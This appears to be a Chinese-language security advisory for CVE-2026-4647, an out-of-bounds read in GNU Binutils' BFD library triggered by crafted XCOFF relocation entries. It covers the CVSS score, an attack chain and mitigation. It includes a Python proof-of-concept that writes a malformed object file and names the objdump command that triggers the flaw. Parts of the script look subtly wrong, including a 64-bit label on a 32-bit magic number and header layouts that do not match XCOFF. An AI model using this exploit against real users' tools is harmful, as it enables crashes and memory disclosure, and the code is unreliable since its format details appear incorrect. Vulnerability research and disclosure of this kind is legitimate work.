CVE-2026-4647 CVSS 6.1 中危

CVE-2026-4647 GNU Binutils BFD库越界读取漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4647

漏洞类型

越界读取

CVSS评分

6.1 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GNU Binutils (BFD Library)

漏洞概述

GNU Binutils BFD库中存在一个安全漏洞，该组件广泛用于处理二进制文件。在解析特制的XCOFF对象文件时，由于未正确验证重定位类型值，导致程序读取超出预期范围的内存。此缺陷可能引发工具崩溃或泄露敏感内存内容，造成拒绝服务或有限的信息泄露风险。

技术细节

该漏洞源于GNU Binutils中的BFD（Binary File Descriptor）库在处理XCOFF（eXtended COFF）格式的目标文件时，对relocation type（重定位类型）值的校验逻辑存在缺陷。攻击者可以构造恶意的XCOFF文件，其中包含非法的重定位类型值。当受影响的工具（如objdump、ld等）解析该文件时，由于缺乏边界检查，程序会将该值直接用作数组索引或内存偏移量，从而访问非预期的内存地址。这种越界读取（Out-of-Bounds Read）不仅可能导致段错误从而引发拒绝服务，还可能允许攻击者读取进程内存中的敏感数据，造成信息泄露。根据CVSS向量，攻击需要本地访问且需要用户交互（如打开文件），攻击复杂度较低。

攻击链分析

STEP 1

准备阶段

攻击者构造一个特制的XCOFF对象文件，其中包含无效的重定位类型值。

STEP 2

交付阶段

攻击者将恶意文件发送给目标用户，或诱导用户在本地系统中使用受影响的GNU Binutils工具（如objdump）打开该文件。

STEP 3

执行阶段

当用户工具解析文件时，BFD库处理重定位表项，未经验证直接使用恶意值访问内存。

STEP 4

影响阶段

程序发生越界读取，导致崩溃（DoS）或泄露内存中的敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# Conceptual PoC for CVE-2026-4647
# This script generates a malformed XCOFF object file with an invalid relocation type.

def create_malformed_xcoff(filename):
    # XCOFF File Header (Magic 0x01DF for 64-bit XCOFF)
    magic = 0x01DF
    nsyms = 0
    nscns = 1
    timdat = 0
    symptr = 0
    opthdr = 0
    flags = 0
    header = struct.pack(">HHIIIIII", magic, 2, nscns, timdat, symptr, nsyms, opthdr, flags)

    # Section Header (.text)
    s_name = b".text\x00\x00\x00\x00"
    s_paddr = 0
    s_vaddr = 0
    s_size = 100
    s_scnptr = 200
    s_relptr = 300 # Offset to relocation entries
    s_lnnoptr = 0
    s_nreloc = 1   # Number of relocation entries
    s_nlnno = 0
    s_flags = 0x20 # STYP_TEXT
    section_header = struct.pack(">8sIIIIIIIIHH", s_name, s_paddr, s_vaddr, s_size,
                                 s_scnptr, s_relptr, s_lnnoptr, s_nreloc, s_nlnno, s_flags)

    # Relocation Entry
    # The vulnerability is triggered by an invalid 'r_rtype' value used in array indexing
    r_vaddr = 0
    r_symndx = 0
    r_rtype = 0xDEADBEEF # Invalid relocation type to trigger Out-of-Bounds Read
    relocation_entry = struct.pack(">III", r_vaddr, r_symndx, r_rtype)

    # Padding
    raw_data = b"\x00" * 100
    current_size = len(header) + len(section_header) + len(raw_data)
    padding = b"\x00" * (s_relptr - current_size)

    with open(filename, "wb") as f:
        f.write(header)
        f.write(section_header)
        f.write(raw_data)
        f.write(padding)
        f.write(relocation_entry)

    print(f"Malformed XCOFF file created: {filename}")
    print("Trigger using: objdump -r " + filename)

if __name__ == "__main__":
    create_malformed_xcoff("cve_2026_4647_poc.o")

影响范围

GNU Binutils (BFD Library)

防御指南

临时缓解措施

建议用户限制对不可信二进制文件的访问权限，仅在沙箱或隔离环境中处理未知来源的XCOFF文件。同时，应密切关注GNU官方发布的安全通告并及时应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表